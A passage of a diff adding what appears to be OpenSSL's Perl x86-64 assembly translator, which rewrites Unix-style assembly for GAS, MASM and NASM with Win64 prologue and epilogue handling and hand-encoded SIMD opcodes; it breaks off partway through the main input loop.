+# enough to provide for dual-ABI OpenSSL modules development...
+# There *are* limitations and you might have to modify your assembler
+# code or this script to achieve the desired result...
+#
+# Currently recognized limitations:
+#
+# - can't use multiple ops per line;
+#
+# Dual-ABI styling rules.
+#
+# 1. Adhere to Unix register and stack layout [see cross-reference
+#    ABI "card" at the end for explanation].
+# 2. Forget about "red zone," stick to more traditional blended
+#    stack frame allocation. If volatile storage is actually required
+#    that is. If not, just leave the stack as is.
+# 3. Functions tagged with ".type name,@function" get crafted with
+#    unified Win64 prologue and epilogue automatically. If you want
+#    to take care of ABI differences yourself, tag functions as
+#    ".type name,@abi-omnipotent" instead.
+# 4. To optimize the Win64 prologue you can specify number of input
+#    arguments as ".type name,@function,N." Keep in mind that if N is
+#    larger than 6, then you *have to* write "abi-omnipotent" code,
+#    because >6 cases can't be addressed with unified prologue.
+# 5. Name local labels as .L*, do *not* use dynamic labels such as 1:
+#    (sorry about latter).
+# 6. Don't use [or hand-code with .byte] "rep ret." "ret" mnemonic is
+#    required to identify the spots, where to inject Win64 epilogue!
+#    But on the pros, it's then prefixed with rep automatically:-)
+# 7. Stick to explicit ip-relative addressing. If you have to use
+#    GOTPCREL addressing, stick to mov symbol@GOTPCREL(%rip),%r??.
+#    Both are recognized and translated to proper Win64 addressing
+#    modes. To support legacy code a synthetic directive, .picmeup,
+#    is implemented. It puts address of the *next* instruction into
+#    target register, e.g.:
+#
+#		.picmeup	%rax
+#		lea		.Label-.(%rax),%rax
+#
+# 8. In order to provide for structured exception handling unified
+#    Win64 prologue copies %rsp value to %rax. For further details
+#    see SEH paragraph at the end.
+# 9. .init segment is allowed to contain calls to functions only.
+# a. If function accepts more than 4 arguments *and* >4th argument
+#    is declared as non 64-bit value, do clear its upper part.
+
+my $flavour = shift;
+my $output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+open STDOUT,">$output" || die "can't open $output: $!"
+	if (defined($output));
+
+my $gas=1;	$gas=0 if ($output =~ /\.asm$/);
+my $elf=1;	$elf=0 if (!$gas);
+my $win64=0;
+my $prefix="";
+my $decor=".L";
+
+my $masmref=8 + 50727*2**-32;	# 8.00.50727 shipped with VS2005
+my $masm=0;
+my $PTR=" PTR";
+
+my $nasmref=2.03;
+my $nasm=0;
+
+if    ($flavour eq "mingw64")	{ $gas=1; $elf=0; $win64=1;
+				  $prefix=`echo __USER_LABEL_PREFIX__ | $ENV{CC} -E -P -`;
+				  chomp($prefix);
+				}
+elsif ($flavour eq "macosx")	{ $gas=1; $elf=0; $prefix="_"; $decor="L\$"; }
+elsif ($flavour eq "masm")	{ $gas=0; $elf=0; $masm=$masmref; $win64=1; $decor="\$L\$"; }
+elsif ($flavour eq "nasm")	{ $gas=0; $elf=0; $nasm=$nasmref; $win64=1; $decor="\$L\$"; $PTR=""; }
+elsif (!$gas)
+{   if ($ENV{ASM} =~ m/nasm/ && `nasm -v` =~ m/version ([0-9]+)\.([0-9]+)/i)
+    {	$nasm = $1 + $2*0.01; $PTR="";  }
+    elsif (`ml64 2>&1` =~ m/Version ([0-9]+)\.([0-9]+)(\.([0-9]+))?/)
+    {	$masm = $1 + $2*2**-16 + $4*2**-32;   }
+    die "no assembler found on %PATH" if (!($nasm || $masm));
+    $win64=1;
+    $elf=0;
+    $decor="\$L\$";
+}
+
+my $current_segment;
+my $current_function;
+my %globals;
+
+{ package opcode;	# pick up opcodes
+    sub re {
+	my	$self = shift;	# single instance in enough...
+	local	*line = shift;
+	undef	$ret;
+
+	if ($line =~ /^([a-z][a-z0-9]*)/i) {
+	    $self->{op} = $1;
+	    $ret = $self;
+	    $line = substr($line,@+[0]); $line =~ s/^\s+//;
+
+	    undef $self->{sz};
+	    if ($self->{op} =~ /^(movz)x?([bw]).*/) {	# movz is pain...
+		$self->{op} = $1;
+		$self->{sz} = $2;
+	    } elsif ($self->{op} =~ /call|jmp/) {
+		$self->{sz} = "";
+	    } elsif ($self->{op} =~ /^p/ && $' !~ /^(ush|op|insrw)/) { # SSEn
+		$self->{sz} = "";
+	    } elsif ($self->{op} =~ /^v/) { # VEX
+		$self->{sz} = "";
+	    } elsif ($self->{op} =~ /mov[dq]/ && $line =~ /%xmm/) {
+		$self->{sz} = "";
+	    } elsif ($self->{op} =~ /([a-z]{3,})([qlwb])$/) {
+		$self->{op} = $1;
+		$self->{sz} = $2;
+	    }
+	}
+	$ret;
+    }
+    sub size {
+	my $self = shift;
+	my $sz   = shift;
+	$self->{sz} = $sz if (defined($sz) && !defined($self->{sz}));
+	$self->{sz};
+    }
+    sub out {
+	my $self = shift;
+	if ($gas) {
+	    if ($self->{op} eq "movz") {	# movz is pain...
+		sprintf "%s%s%s",$self->{op},$self->{sz},shift;
+	    } elsif ($self->{op} =~ /^set/) { 
+		"$self->{op}";
+	    } elsif ($self->{op} eq "ret") {
+		my $epilogue = "";
+		if ($win64 && $current_function->{abi} eq "svr4") {
+		    $epilogue = "movq	8(%rsp),%rdi\n\t" .
+				"movq	16(%rsp),%rsi\n\t";
+		}
+	    	$epilogue . ".byte	0xf3,0xc3";
+	    } elsif ($self->{op} eq "call" && !$elf && $current_segment eq ".init") {
+		".p2align\t3\n\t.quad";
+	    } else {
+		"$self->{op}$self->{sz}";
+	    }
+	} else {
+	    $self->{op} =~ s/^movz/movzx/;
+	    if ($self->{op} eq "ret") {
+		$self->{op} = "";
+		if ($win64 && $current_function->{abi} eq "svr4") {
+		    $self->{op} = "mov	rdi,QWORD${PTR}[8+rsp]\t;WIN64 epilogue\n\t".
+				  "mov	rsi,QWORD${PTR}[16+rsp]\n\t";
+	    	}
+		$self->{op} .= "DB\t0F3h,0C3h\t\t;repret";
+	    } elsif ($self->{op} =~ /^(pop|push)f/) {
+		$self->{op} .= $self->{sz};
+	    } elsif ($self->{op} eq "call" && $current_segment eq ".CRT\$XCU") {
+		$self->{op} = "\tDQ";
+	    } 
+	    $self->{op};
+	}
+    }
+    sub mnemonic {
+	my $self=shift;
+	my $op=shift;
+	$self->{op}=$op if (defined($op));
+	$self->{op};
+    }
+}
+{ package const;	# pick up constants, which start with $
+    sub re {
+	my	$self = shift;	# single instance in enough...
+	local	*line = shift;
+	undef	$ret;
+
+	if ($line =~ /^\$([^,]+)/) {
+	    $self->{value} = $1;
+	    $ret = $self;
+	    $line = substr($line,@+[0]); $line =~ s/^\s+//;
+	}
+	$ret;
+    }
+    sub out {
+    	my $self = shift;
+
+	if ($gas) {
+	    # Solaris /usr/ccs/bin/as can't handle multiplications
+	    # in $self->{value}
+	    $self->{value} =~ s/(?<![\w\$\.])(0x?[0-9a-f]+)/oct($1)/egi;
+	    $self->{value} =~ s/([0-9]+\s*[\*\/\%]\s*[0-9]+)/eval($1)/eg;
+	    sprintf "\$%s",$self->{value};
+	} else {
+	    $self->{value} =~ s/(0b[0-1]+)/oct($1)/eig;
+	    $self->{value} =~ s/0x([0-9a-f]+)/0$1h/ig if ($masm);
+	    sprintf "%s",$self->{value};
+	}
+    }
+}
+{ package ea;		# pick up effective addresses: expr(%reg,%reg,scale)
+    sub re {
+	my	$self = shift;	# single instance in enough...
+	local	*line = shift;
+	undef	$ret;
+
+	# optional * ---vvv--- appears in indirect jmp/call
+	if ($line =~ /^(\*?)([^\(,]*)\(([%\w,]+)\)/) {
+	    $self->{asterisk} = $1;
+	    $self->{label} = $2;
+	    ($self->{base},$self->{index},$self->{scale})=split(/,/,$3);
+	    $self->{scale} = 1 if (!defined($self->{scale}));
+	    $ret = $self;
+	    $line = substr($line,@+[0]); $line =~ s/^\s+//;
+
+	    if ($win64 && $self->{label} =~ s/\@GOTPCREL//) {
+		die if (opcode->mnemonic() ne "mov");
+		opcode->mnemonic("lea");
+	    }
+	    $self->{base}  =~ s/^%//;
+	    $self->{index} =~ s/^%// if (defined($self->{index}));
+	}
+	$ret;
+    }
+    sub size {}
+    sub out {
+    	my $self = shift;
+	my $sz = shift;
+
+	$self->{label} =~ s/([_a-z][_a-z0-9]*)/$globals{$1} or $1/gei;
+	$self->{label} =~ s/\.L/$decor/g;
+
+	# Silently convert all EAs to 64-bit. This is required for
+	# elder GNU assembler and results in more compact code,
+	# *but* most importantly AES module depends on this feature!
+	$self->{index} =~ s/^[er](.?[0-9xpi])[d]?$/r\1/;
+	$self->{base}  =~ s/^[er](.?[0-9xpi])[d]?$/r\1/;
+
+	# Solaris /usr/ccs/bin/as can't handle multiplications
+	# in $self->{label}, new gas requires sign extension...
+	use integer;
+	$self->{label} =~ s/(?<![\w\$\.])(0x?[0-9a-f]+)/oct($1)/egi;
+	$self->{label} =~ s/\b([0-9]+\s*[\*\/\%]\s*[0-9]+)\b/eval($1)/eg;
+	$self->{label} =~ s/\b([0-9]+)\b/$1<<32>>32/eg;
+
+	if (!$self->{label} && $self->{index} && $self->{scale}==1 &&
+	    $self->{base} =~ /(rbp|r13)/) {
+		$self->{base} = $self->{index}; $self->{index} = $1;
+	}
+
+	if ($gas) {
+	    $self->{label} =~ s/^___imp_/__imp__/   if ($flavour eq "mingw64");
+
+	    if (defined($self->{index})) {
+		sprintf "%s%s(%s,%%%s,%d)",$self->{asterisk},
+					$self->{label},
+					$self->{base}?"%$self->{base}":"",
+					$self->{index},$self->{scale};
+	    } else {
+		sprintf "%s%s(%%%s)",	$self->{asterisk},$self->{label},$self->{base};
+	    }
+	} else {
+	    %szmap = (	b=>"BYTE$PTR",  w=>"WORD$PTR",
+			l=>"DWORD$PTR", d=>"DWORD$PTR",
+	    		q=>"QWORD$PTR", o=>"OWORD$PTR",
+			x=>"XMMWORD$PTR", y=>"YMMWORD$PTR", z=>"ZMMWORD$PTR" );
+
+	    $self->{label} =~ s/\./\$/g;
+	    $self->{label} =~ s/(?<![\w\$\.])0x([0-9a-f]+)/0$1h/ig;
+	    $self->{label} = "($self->{label})" if ($self->{label} =~ /[\*\+\-\/]/);
+
+	    ($self->{asterisk})					&& ($sz="q") ||
+	    (opcode->mnemonic() =~ /^v?mov([qd])$/)		&& ($sz=$1)  ||
+	    (opcode->mnemonic() =~ /^v?pinsr([qdwb])$/)		&& ($sz=$1)  ||
+	    (opcode->mnemonic() =~ /^vpbroadcast([qdwb])$/)	&& ($sz=$1)  ||
+	    (opcode->mnemonic() =~ /^vinsert[fi]128$/)		&& ($sz="x");
+
+	    if (defined($self->{index})) {
+		sprintf "%s[%s%s*%d%s]",$szmap{$sz},
+					$self->{label}?"$self->{label}+":"",
+					$self->{index},$self->{scale},
+					$self->{base}?"+$self->{base}":"";
+	    } elsif ($self->{base} eq "rip") {
+		sprintf "%s[%s]",$szmap{$sz},$self->{label};
+	    } else {
+		sprintf "%s[%s%s]",$szmap{$sz},
+					$self->{label}?"$self->{label}+":"",
+					$self->{base};
+	    }
+	}
+    }
+}
+{ package register;	# pick up registers, which start with %.
+    sub re {
+	my	$class = shift;	# muliple instances...
+	my	$self = {};
+	local	*line = shift;
+	undef	$ret;
+
+	# optional * ---vvv--- appears in indirect jmp/call
+	if ($line =~ /^(\*?)%(\w+)/) {
+	    bless $self,$class;
+	    $self->{asterisk} = $1;
+	    $self->{value} = $2;
+	    $ret = $self;
+	    $line = substr($line,@+[0]); $line =~ s/^\s+//;
+	}
+	$ret;
+    }
+    sub size {
+	my	$self = shift;
+	undef	$ret;
+
+	if    ($self->{value} =~ /^r[\d]+b$/i)	{ $ret="b"; }
+	elsif ($self->{value} =~ /^r[\d]+w$/i)	{ $ret="w"; }
+	elsif ($self->{value} =~ /^r[\d]+d$/i)	{ $ret="l"; }
+	elsif ($self->{value} =~ /^r[\w]+$/i)	{ $ret="q"; }
+	elsif ($self->{value} =~ /^[a-d][hl]$/i){ $ret="b"; }
+	elsif ($self->{value} =~ /^[\w]{2}l$/i)	{ $ret="b"; }
+	elsif ($self->{value} =~ /^[\w]{2}$/i)	{ $ret="w"; }
+	elsif ($self->{value} =~ /^e[a-z]{2}$/i){ $ret="l"; }
+
+	$ret;
+    }
+    sub out {
+    	my $self = shift;
+	if ($gas)	{ sprintf "%s%%%s",$self->{asterisk},$self->{value}; }
+	else		{ $self->{value}; }
+    }
+}
+{ package label;	# pick up labels, which end with :
+    sub re {
+	my	$self = shift;	# single instance is enough...
+	local	*line = shift;
+	undef	$ret;
+
+	if ($line =~ /(^[\.\w]+)\:/) {
+	    $self->{value} = $1;
+	    $ret = $self;
+	    $line = substr($line,@+[0]); $line =~ s/^\s+//;
+
+	    $self->{value} =~ s/^\.L/$decor/;
+	}
+	$ret;
+    }
+    sub out {
+	my $self = shift;
+
+	if ($gas) {
+	    my $func = ($globals{$self->{value}} or $self->{value}) . ":";
+	    if ($win64	&&
+			$current_function->{name} eq $self->{value} &&
+			$current_function->{abi} eq "svr4") {
+		$func .= "\n";
+		$func .= "	movq	%rdi,8(%rsp)\n";
+		$func .= "	movq	%rsi,16(%rsp)\n";
+		$func .= "	movq	%rsp,%rax\n";
+		$func .= "${decor}SEH_begin_$current_function->{name}:\n";
+		my $narg = $current_function->{narg};
+		$narg=6 if (!defined($narg));
+		$func .= "	movq	%rcx,%rdi\n" if ($narg>0);
+		$func .= "	movq	%rdx,%rsi\n" if ($narg>1);
+		$func .= "	movq	%r8,%rdx\n"  if ($narg>2);
+		$func .= "	movq	%r9,%rcx\n"  if ($narg>3);
+		$func .= "	movq	40(%rsp),%r8\n" if ($narg>4);
+		$func .= "	movq	48(%rsp),%r9\n" if ($narg>5);
+	    }
+	    $func;
+	} elsif ($self->{value} ne "$current_function->{name}") {
+	    $self->{value} .= ":" if ($masm && $ret!~m/^\$/);
+	    $self->{value} . ":";
+	} elsif ($win64 && $current_function->{abi} eq "svr4") {
+	    my $func =	"$current_function->{name}" .
+			($nasm ? ":" : "\tPROC $current_function->{scope}") .
+			"\n";
+	    $func .= "	mov	QWORD${PTR}[8+rsp],rdi\t;WIN64 prologue\n";
+	    $func .= "	mov	QWORD${PTR}[16+rsp],rsi\n";
+	    $func .= "	mov	rax,rsp\n";
+	    $func .= "${decor}SEH_begin_$current_function->{name}:";
+	    $func .= ":" if ($masm);
+	    $func .= "\n";
+	    my $narg = $current_function->{narg};
+	    $narg=6 if (!defined($narg));
+	    $func .= "	mov	rdi,rcx\n" if ($narg>0);
+	    $func .= "	mov	rsi,rdx\n" if ($narg>1);
+	    $func .= "	mov	rdx,r8\n"  if ($narg>2);
+	    $func .= "	mov	rcx,r9\n"  if ($narg>3);
+	    $func .= "	mov	r8,QWORD${PTR}[40+rsp]\n" if ($narg>4);
+	    $func .= "	mov	r9,QWORD${PTR}[48+rsp]\n" if ($narg>5);
+	    $func .= "\n";
+	} else {
+	   "$current_function->{name}".
+			($nasm ? ":" : "\tPROC $current_function->{scope}");
+	}
+    }
+}
+{ package expr;		# pick up expressioins
+    sub re {
+	my	$self = shift;	# single instance is enough...
+	local	*line = shift;
+	undef	$ret;
+
+	if ($line =~ /(^[^,]+)/) {
+	    $self->{value} = $1;
+	    $ret = $self;
+	    $line = substr($line,@+[0]); $line =~ s/^\s+//;
+
+	    $self->{value} =~ s/\@PLT// if (!$elf);
+	    $self->{value} =~ s/([_a-z][_a-z0-9]*)/$globals{$1} or $1/gei;
+	    $self->{value} =~ s/\.L/$decor/g;
+	}
+	$ret;
+    }
+    sub out {
+	my $self = shift;
+	if ($nasm && opcode->mnemonic()=~m/^j(?![re]cxz)/) {
+	    "NEAR ".$self->{value};
+	} else {
+	    $self->{value};
+	}
+    }
+}
+{ package directive;	# pick up directives, which start with .
+    sub re {
+	my	$self = shift;	# single instance is enough...
+	local	*line = shift;
+	undef	$ret;
+	my	$dir;
+	my	%opcode =	# lea 2f-1f(%rip),%dst; 1: nop; 2:
+		(	"%rax"=>0x01058d48,	"%rcx"=>0x010d8d48,
+			"%rdx"=>0x01158d48,	"%rbx"=>0x011d8d48,
+			"%rsp"=>0x01258d48,	"%rbp"=>0x012d8d48,
+			"%rsi"=>0x01358d48,	"%rdi"=>0x013d8d48,
+			"%r8" =>0x01058d4c,	"%r9" =>0x010d8d4c,
+			"%r10"=>0x01158d4c,	"%r11"=>0x011d8d4c,
+			"%r12"=>0x01258d4c,	"%r13"=>0x012d8d4c,
+			"%r14"=>0x01358d4c,	"%r15"=>0x013d8d4c	);
+
+	if ($line =~ /^\s*(\.\w+)/) {
+	    $dir = $1;
+	    $ret = $self;
+	    undef $self->{value};
+	    $line = substr($line,@+[0]); $line =~ s/^\s+//;
+
+	    SWITCH: for ($dir) {
+		/\.picmeup/ && do { if ($line =~ /(%r[\w]+)/i) {
+			    		$dir="\t.long";
+					$line=sprintf "0x%x,0x90000000",$opcode{$1};
+				    }
+				    last;
+				  };
+		/\.global|\.globl|\.extern/
+			    && do { $globals{$line} = $prefix . $line;
+				    $line = $globals{$line} if ($prefix);
+				    last;
+				  };
+		/\.type/    && do { ($sym,$type,$narg) = split(',',$line);
+				    if ($type eq "\@function") {
+					undef $current_function;
+					$current_function->{name} = $sym;
+					$current_function->{abi}  = "svr4";
+					$current_function->{narg} = $narg;
+					$current_function->{scope} = defined($globals{$sym})?"PUBLIC":"PRIVATE";
+				    } elsif ($type eq "\@abi-omnipotent") {
+					undef $current_function;
+					$current_function->{name} = $sym;
+					$current_function->{scope} = defined($globals{$sym})?"PUBLIC":"PRIVATE";
+				    }
+				    $line =~ s/\@abi\-omnipotent/\@function/;
+				    $line =~ s/\@function.*/\@function/;
+				    last;
+				  };
+		/\.asciz/   && do { if ($line =~ /^"(.*)"$/) {
+					$dir  = ".byte";
+					$line = join(",",unpack("C*",$1),0);
+				    }
+				    last;
+				  };
+		/\.rva|\.long|\.quad/
+			    && do { $line =~ s/([_a-z][_a-z0-9]*)/$globals{$1} or $1/gei;
+				    $line =~ s/\.L/$decor/g;
+				    last;
+				  };
+	    }
+
+	    if ($gas) {
+		$self->{value} = $dir . "\t" . $line;
+
+		if ($dir =~ /\.extern/) {
+		    $self->{value} = ""; # swallow extern
+		} elsif (!$elf && $dir =~ /\.type/) {
+		    $self->{value} = "";
+		    $self->{value} = ".def\t" . ($globals{$1} or $1) . ";\t" .
+				(defined($globals{$1})?".scl 2;":".scl 3;") .
+				"\t.type 32;\t.endef"
+				if ($win64 && $line =~ /([^,]+),\@function/);
+		} elsif (!$elf && $dir =~ /\.size/) {
+		    $self->{value} = "";
+		    if (defined($current_function)) {
+			$self->{value} .= "${decor}SEH_end_$current_function->{name}:"
+				if ($win64 && $current_function->{abi} eq "svr4");
+			undef $current_function;
+		    }
+		} elsif (!$elf && $dir =~ /\.align/) {
+		    $self->{value} = ".p2align\t" . (log($line)/log(2));
+		} elsif ($dir eq ".section") {
+		    $current_segment=$line;
+		    if (!$elf && $current_segment eq ".init") {
+			if	($flavour eq "macosx")	{ $self->{value} = ".mod_init_func"; }
+			elsif	($flavour eq "mingw64")	{ $self->{value} = ".section\t.ctors"; }
+		    }
+		} elsif ($dir =~ /\.(text|data)/) {
+		    $current_segment=".$1";
+		} elsif ($dir =~ /\.hidden/) {
+		    if    ($flavour eq "macosx")  { $self->{value} = ".private_extern\t$prefix$line"; }
+		    elsif ($flavour eq "mingw64") { $self->{value} = ""; }
+		} elsif ($dir =~ /\.comm/) {
+		    $self->{value} = "$dir\t$prefix$line";
+		    $self->{value} =~ s|,([0-9]+),([0-9]+)$|",$1,".log($2)/log(2)|e if ($flavour eq "macosx");
+		}
+		$line = "";
+		return $self;
+	    }
+
+	    # non-gas case or nasm/masm
+	    SWITCH: for ($dir) {
+		/\.text/    && do { my $v=undef;
+				    if ($nasm) {
+					$v="section	.text code align=64\n";
+				    } else {
+					$v="$current_segment\tENDS\n" if ($current_segment);
+					$current_segment = ".text\$";
+					$v.="$current_segment\tSEGMENT ";
+					$v.=$masm>=$masmref ? "ALIGN(256)" : "PAGE";
+					$v.=" 'CODE'";
+				    }
+				    $self->{value} = $v;
+				    last;
+				  };
+		/\.data/    && do { my $v=undef;
+				    if ($nasm) {
+					$v="section	.data data align=8\n";
+				    } else {
+					$v="$current_segment\tENDS\n" if ($current_segment);
+					$current_segment = "_DATA";
+					$v.="$current_segment\tSEGMENT";
+				    }
+				    $self->{value} = $v;
+				    last;
+				  };
+		/\.section/ && do { my $v=undef;
+				    $line =~ s/([^,]*).*/$1/;
+				    $line = ".CRT\$XCU" if ($line eq ".init");
+				    if ($nasm) {
+					$v="section	$line";
+					if ($line=~/\.([px])data/) {
+					    $v.=" rdata align=";
+					    $v.=$1 eq "p"? 4 : 8;
+					} elsif ($line=~/\.CRT\$/i) {
+					    $v.=" rdata align=8";
+					}
+				    } else {
+					$v="$current_segment\tENDS\n" if ($current_segment);
+					$v.="$line\tSEGMENT";
+					if ($line=~/\.([px])data/) {
+					    $v.=" READONLY";
+					    $v.=" ALIGN(".($1 eq "p" ? 4 : 8).")" if ($masm>=$masmref);
+					} elsif ($line=~/\.CRT\$/i) {
+					    $v.=" READONLY ";
+					    $v.=$masm>=$masmref ? "ALIGN(8)" : "DWORD";
+					}
+				    }
+				    $current_segment = $line;
+				    $self->{value} = $v;
+				    last;
+				  };
+		/\.extern/  && do { $self->{value}  = "EXTERN\t".$line;
+				    $self->{value} .= ":NEAR" if ($masm);
+				    last;
+				  };
+		/\.globl|.global/
+			    && do { $self->{value}  = $masm?"PUBLIC":"global";
+				    $self->{value} .= "\t".$line;
+				    last;
+				  };
+		/\.size/    && do { if (defined($current_function)) {
+					undef $self->{value};
+					if ($current_function->{abi} eq "svr4") {
+					    $self->{value}="${decor}SEH_end_$current_function->{name}:";
+					    $self->{value}.=":\n" if($masm);
+					}
+					$self->{value}.="$current_function->{name}\tENDP" if($masm && $current_function->{name});
+					undef $current_function;
+				    }
+				    last;
+				  };
+		/\.align/   && do { $self->{value} = "ALIGN\t".$line; last; };
+		/\.(value|long|rva|quad)/
+			    && do { my $sz  = substr($1,0,1);
+				    my @arr = split(/,\s*/,$line);
+				    my $last = pop(@arr);
+				    my $conv = sub  {	my $var=shift;
+							$var=~s/^(0b[0-1]+)/oct($1)/eig;
+							$var=~s/^0x([0-9a-f]+)/0$1h/ig if ($masm);
+							if ($sz eq "D" && ($current_segment=~/.[px]data/ || $dir eq ".rva"))
+							{ $var=~s/([_a-z\$\@][_a-z0-9\$\@]*)/$nasm?"$1 wrt ..imagebase":"imagerel $1"/egi; }
+							$var;
+						    };  
+
+				    $sz =~ tr/bvlrq/BWDDQ/;
+				    $self->{value} = "\tD$sz\t";
+				    for (@arr) { $self->{value} .= &$conv($_).","; }
+				    $self->{value} .= &$conv($last);
+				    last;
+				  };
+		/\.byte/    && do { my @str=split(/,\s*/,$line);
+				    map(s/(0b[0-1]+)/oct($1)/eig,@str);
+				    map(s/0x([0-9a-f]+)/0$1h/ig,@str) if ($masm);	
+				    while ($#str>15) {
+					$self->{value}.="DB\t"
+						.join(",",@str[0..15])."\n";
+					foreach (0..15) { shift @str; }
+				    }
+				    $self->{value}.="DB\t"
+						.join(",",@str) if (@str);
+				    last;
+				  };
+		/\.comm/    && do { my @str=split(/,\s*/,$line);
+				    my $v=undef;
+				    if ($nasm) {
+					$v.="common	$prefix@str[0] @str[1]";
+				    } else {
+					$v="$current_segment\tENDS\n" if ($current_segment);
+					$current_segment = "_DATA";
+					$v.="$current_segment\tSEGMENT\n";
+					$v.="COMM	@str[0]:DWORD:".@str[1]/4;
+				    }
+				    $self->{value} = $v;
+				    last;
+				  };
+	    }
+	    $line = "";
+	}
+
+	$ret;
+    }
+    sub out {
+	my $self = shift;
+	$self->{value};
+    }
+}
+
+sub rex {
+ local *opcode=shift;
+ my ($dst,$src,$rex)=@_;
+
+   $rex|=0x04 if($dst>=8);
+   $rex|=0x01 if($src>=8);
+   push @opcode,($rex|0x40) if ($rex);
+}
+
+# older gas and ml64 don't handle SSE>2 instructions
+my %regrm = (	"%eax"=>0, "%ecx"=>1, "%edx"=>2, "%ebx"=>3,
+		"%esp"=>4, "%ebp"=>5, "%esi"=>6, "%edi"=>7	);
+
+my $movq = sub {	# elderly gas can't handle inter-register movq
+  my $arg = shift;
+  my @opcode=(0x66);
+    if ($arg =~ /%xmm([0-9]+),\s*%r(\w+)/) {
+	my ($src,$dst)=($1,$2);
+	if ($dst !~ /[0-9]+/)	{ $dst = $regrm{"%e$dst"}; }
+	rex(\@opcode,$src,$dst,0x8);
+	push @opcode,0x0f,0x7e;
+	push @opcode,0xc0|(($src&7)<<3)|($dst&7);	# ModR/M
+	@opcode;
+    } elsif ($arg =~ /%r(\w+),\s*%xmm([0-9]+)/) {
+	my ($src,$dst)=($2,$1);
+	if ($dst !~ /[0-9]+/)	{ $dst = $regrm{"%e$dst"}; }
+	rex(\@opcode,$src,$dst,0x8);
+	push @opcode,0x0f,0x6e;
+	push @opcode,0xc0|(($src&7)<<3)|($dst&7);	# ModR/M
+	@opcode;
+    } else {
+	();
+    }
+};
+
+my $pextrd = sub {
+    if (shift =~ /\$([0-9]+),\s*%xmm([0-9]+),\s*(%\w+)/) {
+      my @opcode=(0x66);
+	$imm=$1;
+	$src=$2;
+	$dst=$3;
+	if ($dst =~ /%r([0-9]+)d/)	{ $dst = $1; }
+	elsif ($dst =~ /%e/)		{ $dst = $regrm{$dst}; }
+	rex(\@opcode,$src,$dst);
+	push @opcode,0x0f,0x3a,0x16;
+	push @opcode,0xc0|(($src&7)<<3)|($dst&7);	# ModR/M
+	push @opcode,$imm;
+	@opcode;
+    } else {
+	();
+    }
+};
+
+my $pinsrd = sub {
+    if (shift =~ /\$([0-9]+),\s*(%\w+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x66);
+	$imm=$1;
+	$src=$2;
+	$dst=$3;
+	if ($src =~ /%r([0-9]+)/)	{ $src = $1; }
+	elsif ($src =~ /%e/)		{ $src = $regrm{$src}; }
+	rex(\@opcode,$dst,$src);
+	push @opcode,0x0f,0x3a,0x22;
+	push @opcode,0xc0|(($dst&7)<<3)|($src&7);	# ModR/M
+	push @opcode,$imm;
+	@opcode;
+    } else {
+	();
+    }
+};
+
+my $pshufb = sub {
+    if (shift =~ /%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x66);
+	rex(\@opcode,$2,$1);
+	push @opcode,0x0f,0x38,0x00;
+	push @opcode,0xc0|($1&7)|(($2&7)<<3);		# ModR/M
+	@opcode;
+    } else {
+	();
+    }
+};
+
+my $palignr = sub {
+    if (shift =~ /\$([0-9]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x66);
+	rex(\@opcode,$3,$2);
+	push @opcode,0x0f,0x3a,0x0f;
+	push @opcode,0xc0|($2&7)|(($3&7)<<3);		# ModR/M
+	push @opcode,$1;
+	@opcode;
+    } else {
+	();
+    }
+};
+
+my $pclmulqdq = sub {
+    if (shift =~ /\$([x0-9a-f]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x66);
+	rex(\@opcode,$3,$2);
+	push @opcode,0x0f,0x3a,0x44;
+	push @opcode,0xc0|($2&7)|(($3&7)<<3);		# ModR/M
+	my $c=$1;
+	push @opcode,$c=~/^0/?oct($c):$c;
+	@opcode;
+    } else {
+	();
+    }
+};
+
+my $rdrand = sub {
+    if (shift =~ /%[er](\w+)/) {
+      my @opcode=();
+      my $dst=$1;
+	if ($dst !~ /[0-9]+/) { $dst = $regrm{"%e$dst"}; }
+	rex(\@opcode,0,$1,8);
+	push @opcode,0x0f,0xc7,0xf0|($dst&7);
+	@opcode;
+    } else {
+	();
+    }
+};
+
+my $rdseed = sub {
+    if (shift =~ /%[er](\w+)/) {
+      my @opcode=();
+      my $dst=$1;
+	if ($dst !~ /[0-9]+/) { $dst = $regrm{"%e$dst"}; }
+	rex(\@opcode,0,$1,8);
+	push @opcode,0x0f,0xc7,0xf8|($dst&7);
+	@opcode;
+    } else {
+	();
+    }
+};
+
+sub rxb {
+ local *opcode=shift;
+ my ($dst,$src1,$src2,$rxb)=@_;
+
+   $rxb|=0x7<<5;
+   $rxb&=~(0x04<<5) if($dst>=8);
+   $rxb&=~(0x01<<5) if($src1>=8);
+   $rxb&=~(0x02<<5) if($src2>=8);
+   push @opcode,$rxb;
+}
+
+my $vprotd = sub {
+    if (shift =~ /\$([x0-9a-f]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x8f);
+	rxb(\@opcode,$3,$2,-1,0x08);
+	push @opcode,0x78,0xc2;
+	push @opcode,0xc0|($2&7)|(($3&7)<<3);		# ModR/M
+	my $c=$1;
+	push @opcode,$c=~/^0/?oct($c):$c;
+	@opcode;
+    } else {
+	();
+    }
+};
+
+my $vprotq = sub {
+    if (shift =~ /\$([x0-9a-f]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x8f);
+	rxb(\@opcode,$3,$2,-1,0x08);
+	push @opcode,0x78,0xc3;
+	push @opcode,0xc0|($2&7)|(($3&7)<<3);		# ModR/M
+	my $c=$1;
+	push @opcode,$c=~/^0/?oct($c):$c;
+	@opcode;
+    } else {
+	();
+    }
+};
+
+if ($nasm) {
+    print <<___;
+default	rel
+%define XMMWORD
+%define YMMWORD
+%define ZMMWORD
+___
+} elsif ($masm) {
+    print <<___;
+OPTION	DOTNAME
+___
+}
+while($line=<>) {
+
+    chomp($line);
+
+    $line =~ s|[#!].*$||;	# get rid of asm-style comments...
+    $line =~ s|/\*.*\*/||;	# ... and C-style comments...
+    $line =~ s|^\s+||;		# ... and skip white spaces in beginning
+    $line =~ s|\s+$||;		# ... and at the end
+
+    undef $label;
+    undef $opcode;
+    undef @args;
+
+    if ($label=label->re(\$line))	{ print $label->out(); }
+
+    if (directive->re(\$line)) {
+	printf "%s",directive->out();
+    } elsif ($opcode=opcode->re(\$line)) {
+	my $asm = eval("\$".$opcode->mnemonic());
+	undef @bytes;
+	
